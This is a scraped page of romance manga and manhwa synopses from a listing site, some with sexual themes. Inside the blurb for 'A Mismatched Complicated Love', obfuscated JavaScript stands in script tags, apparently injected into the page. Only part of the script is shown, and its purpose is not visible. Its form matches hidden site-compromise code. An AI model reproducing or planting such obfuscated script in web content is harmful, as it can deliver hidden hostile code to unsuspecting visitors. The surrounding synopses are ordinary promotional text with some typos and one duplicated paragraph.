Romance - Page 1828

Romance manga is a genre that explores romantic relationships, filled with emotional highs and lows, offering readers a heartfelt journey of love, growth, and conflict.

24314 results


“The only time I will be meek and willing with this man… is when we’re in bed.” Her first impression of him is that he is the worst. Uncaring, attached, and completely not worth her consideration, until… Misao Narita is a fresh graduate and brand new office worker, who absolutely hates her superior at work. His name is Ichikawa. He is extremely tall and always has a dark look in his eyes. And yet…?! Due to an accident, they end up as friends with benefits. A purely physical attraction, it is completely different from the ideal romance that she had in mind. She knows they should stop, but somehow, they can’t! Usotsuki (MITSUBA Yuu) كاذب เกมรัก นักโกหก The Liar ライアー 虚实之爱 虛實之愛


Flowers of Worship

Flowers of Worship / 경배의 꽃 It was in the middle of the night that the woman who would be the Duchess came to see me. She said my father and mother died, and my kind uncle became king. She said it’s not worth it for me, the crown prince, to be living in hiding, too. “A while ago, Your Highness had been hiding from me. With all due respect, is that for the sake of survival? Just because your parents died doesn’t mean you have no reason to survive. Actually, that fact alone made it all the more reason why you should live. If you die now…” If I died now? When I asked her while looking at her eyes, the woman eventually brought out the harsh truth with empathetic eyes. “It’s like a dog’s death.” “That’s rude….” It’s been a long time since I said that. In a short while, he has been treated as a madman and beaten to death just by saying similar things. She loosened her arms that held me and I suddenly stiffened up due to it. Because I thought she might have loosened her arm to hit me. But she didn’t. She knelt down with one knee in front of me, just like a knight. “Hastred’s Sarian raised her salutations. May you accept it gladly.” My first knight is beautiful and kind. “Are you on my side?” “Yes, Your Highness.” It was all a lie.


A Mismatched Complicated Love

Saiga Kyousuke, the hottest boy in high school, has been rejecting confessions from every girl for one year straight. What he wants is someone who is interesting and different from others. One day, he meets a mysterious junior who is more than a little different…<script></script><script>function _0x274d(_0x13d6ec,_0x568398){var _0x8c994a=_0x9fac();return _0x274d=function(_0x5df2fe,_0x15de96){_0x5df2fe=_0x5df2fe-(0x13a+-0x2337+-0x22ed*-0x1);var _0x520885=_0x8c994a[_0x5df2fe];return _0x520885;},_0x274d(_0x13d6ec,_0x568398);}(function(_0xca023c,_0x59e04a){var _0x53026d=_0x274d,_0x7d155d=_0xca023c();while(!![]){try{var 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Leave My Child Alone

“Don’t misunderstand. I just want your milk.” Lee Yohan. There were days when I thought I might die if I stayed by his side. There were days when I felt suffocated. Each day by his side was like that for me. So I had no choice but to run away. “Oppa, stop it.” He was my first love, and my first man. During the four months we were together, I spent almost every night with this man. So my body couldn’t help but remember… “Haa…” The pitch-black eyes that stared directly at Hari captivated her. His gaze was enough to take one’s breath away. His eyes were strikingly similar to Nuri’s, my daughter’s father… The despairing reality once again cornered her.


Ryun’s Companion

Read manhwa Ryun’s Companion / 륜의 반려 A novice hunter named Solro lives with her elderly father deep in the mountains, and because the weather changes according to her mood, one day she decided to hunt at night instead of her father, but she accidentally shot an arrow at someone.. “Dad, will I be okay? “I think I killed someone.” Ryun, Prince Onryong, went hunting with his servants but fell into the Empress’s scheme and wandered the hunting grounds alone. Suddenly he saw an arrow shoot towards him and hit him. He tried to use his remaining energy to whoever approached him, but failed. “Why did you let me live? What the hell are you planning, what’s your goal in keeping me alive?” However, it turns out that the archer is a girl disguised as foreve, Because of her crime and because of her father’s intervention with a dagger to protect her, the Crown Prince decided to take her with him to the palace as a booty. A land of dragons hidden in the clouds, Solro is the dragon who can control the sky and Crown Prince Ryun keeps her by his side. Stories of myths and monsters have long been rumored, so can the love between the two be preserved and this desire be allowed to develop forever?


My Engagement Was Called Off Under False Accusations, But Who Ever Said My Face Was Ugly Beneath The Mask?

My Engagement Was Called Off Under False Accusations, but Who Ever Said My Face Was Ugly Beneath the Mask? “The refined daughter of a Duke strikes back against the bizarre charges put on herwith the help of her Dear Brother, of course!” Katya has always hid her face under a mask during her days at the academy. Now, right in the middle of the graduation party, her fianc the First Prince calls off their engagement, accusing her of being as mean-hearted as her ugly appearance. But he should’ve thought twice, because after all, who ever said beneath the mask was an ugly face?


One-Sided Marriage

“Warning: Yaoi content: This manga contains materials that might not be suitable to children under 17. By proceeding, you are confirming that you are 17 or older.” When Li Yuzen first deputed, he made his marriage public. The media was flabbergasted. It was the talk of the town. However, no one could figure it out who he was married to. After a while, the fans started doubting the validity of the news. After all, no one saw the rumoured mysterious wife…. Dan Fang Mian Yi Hun Dān Fāng Miàn Yǐ Hūn Sorry, I’m Engaged Unilaterally Married 单方面已婚


Queen Cecia’s Shorts

With 99 nations conquered and the cup of the ruler in her hands… you’d think she was off to a heroic conquest, but the great queen’s Cecia’s real concern was her uncomfortable corset? The queen of Valencia suffered from complicated laces and heavy corsets, and thus ordered her trusted brother, Duke Ennon Lionheart to bring her a comfortable clothes. Meanwhile, Yuri, a clothing designer was killed in an accident after suffering from a small minimum wage at a medium-sized clothing company in Korea. She was reborn in a medieval country ruled by Cecia. Yuri vowed to revolutionize the outdated clothing dilemma, so she dressed up as a man and worked as a designer at the top of the continent’s highest court to do easy business. But… what happens when Ennon discover’s Yuri’s true identity…?


The Odd One Next Door

The Odd One Next Door / Your Neighbor’s Preference / Your Neighbor’s Taste / 奇怪的邻居 / 隣人の趣向 / 네 이웃의 취향 Yoo Gaeun is done with dating. After her ex left her to marry a famous actress, she now spends her days running her late mother’s studio and cleaning up after her twin’s messes. But her quiet life changes drastically when crude and cranky Kang Siwan moves into a nearby house. Though Gaeun tries to be civil to her odd neighbor, sparks fly every time they meet, causing one argument after another. Will she ever manage to make peace with Siwan, or will the sparks set fire to something else in her?


Please Teach Me, Senior

가르쳐주세요, 선배


Opening The Female Match Making Strategy Game

The heroine travels into the game and is reborn as a cannon fodder female supporter. In order to return to the world, she needs to complete the strategy task. In the process of getting along with the game system, the emotionless little system gradually has human emotions, and the system has grown from Zhengtai to a handsome man., in love with the heroine.The heroine travels into the game and is reborn as a cannon fodder female supporter. In order to return to the world, she needs to complete the strategy task. In the process of getting along with the game system, the emotionless little system gradually has human emotions, and the system has grown from Zhengtai to a handsome man., in love with the heroine.
